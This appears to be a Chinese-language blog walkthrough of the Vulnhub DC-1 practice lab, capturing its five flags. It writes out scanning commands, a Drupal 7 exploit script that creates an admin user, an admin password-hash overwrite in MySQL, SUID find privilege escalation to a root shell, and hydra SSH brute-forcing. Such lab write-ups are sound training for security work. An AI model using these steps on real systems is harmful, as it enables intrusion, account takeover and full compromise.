記一次Vulnhub靶場練習記錄
靶機DC-1下載地址:
官方地址
https://download.vulnhub.com/dc/DC-1.zip
該靶場共有5個flag,下面我們一個一個尋找
打開靶機,使用kali進行局域網地址掃描
方法一、
arp-scan -l
方法二、
查看本機IP
ip addr
nmap -sP 192.168.101.0/24
發現目標主機后檢測其開放的端口
nmap -A -p- 192.168.101.11
發現開啟了80端口,在瀏覽器查看頁面信息
使用kali的Metasploit工具檢查Drupal網站存在的漏洞
使用相對較新的漏洞成功率會高一點
順利拿到shell,查看當前目錄下的文件結構
發現flag1.txt,使用cat命令進行查看
得到下一步驟的提示,去查看配置文件
查找后發現CMS的配置文件是網站根目錄下的sites/default下的setting.php文件
查看文件信息
在這里發現了flag2和數據庫用戶名和密碼的信息
嘗試登陸數據庫
發現有python工具
發現靶機已安裝python 2.7.3,通過pty.spawn()獲得交互式shell
python -c 'import pty; pty.spawn("/bin/bash")'
利用之前拿到的賬號密碼登陸MySQL
mysql -udbuser -pR0ck3t
成功登陸到MySQL數據庫中,查看數據庫名
發現users數據表,猜測存儲的是用戶信息
這里有兩個方法獲得admin權限
方法一、使用漏洞得到一個具有admin權限的新用戶
查看版本信息
cat /var/www/includes/bootstrap.inc | grep VERSION
Drupal版本為7.24
查詢攻擊腳本信息
searchsploit drupal
可以添加的用戶名為admin1,密碼為admin1使用適合的攻擊腳本進行攻擊
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.101.11 -u admin1 -p admin1
查詢數據庫信息
方法二、更改admin的密碼
加密腳本位置在網站根目錄下的scripts下,查詢網站根目錄位置
切換到網站根目錄,使用加密腳本生成加密密文
./scripts/password-hash.sh
進入MySQL更改admin密碼
update users set pass="$S$D1mTsTyVgtvyORw3IOMad6WA5GlcWXJXFTNIzW670qs055u0/mY9" where uid=1;
查詢數據信息
更改成功
在網頁進行登陸,在Content中發現flag3
Flag3關鍵詞有perms、find、-exec、shadow
使用find查詢有特殊權限suid的命令
find / -perm -4000
find / -type f -perm -u=s 2>/dev/null
發現其中有find命令,使用find命令進行提權
開始嘗試
touch aaa
find ./ -name aaa -exec "whoami" \;
find ./ -name aaa -exec "/bin/sh" \;
成功提權
之前在查看網站根目錄時發現有一個flag4用戶,所以在home目錄下應該還有一個flag4目錄
進行查看
查看root目錄結構
成功拿到全部flag
.
.
.
.
.
.
此系統的flag4用戶可以使用hydra工具爆破密碼,下載John密碼包
wget clone http://www.openwall.com/john/j/john-1.8.0.tar.gz
tar -xvf john-1.8.0.tar.gz
cd john-1.8.0/src
make linux-x86-64
查看/etc/shadow信息
使用如下命令進行暴力破解
hydra -l flag4 -P john-1.8.0/run/password.lst ssh://192.168.101.11 -f -vV -o hydraflag4.ssh
得到flag4的賬號密碼
login: flag4 password: orange
可以使用ssh進行登陸
如果直接進行了提權操作就不需要對flag4進行暴力破解了,可以直接看到flag4信息,而且flag4用戶無法查看/root目錄內的文件信息,所以還是直接提權方便一點
.
本文參考文檔
https://blog.csdn.net/weixin_43583637/article/details/101542749
https://blog.csdn.net/weixin_41038469/article/details/88409725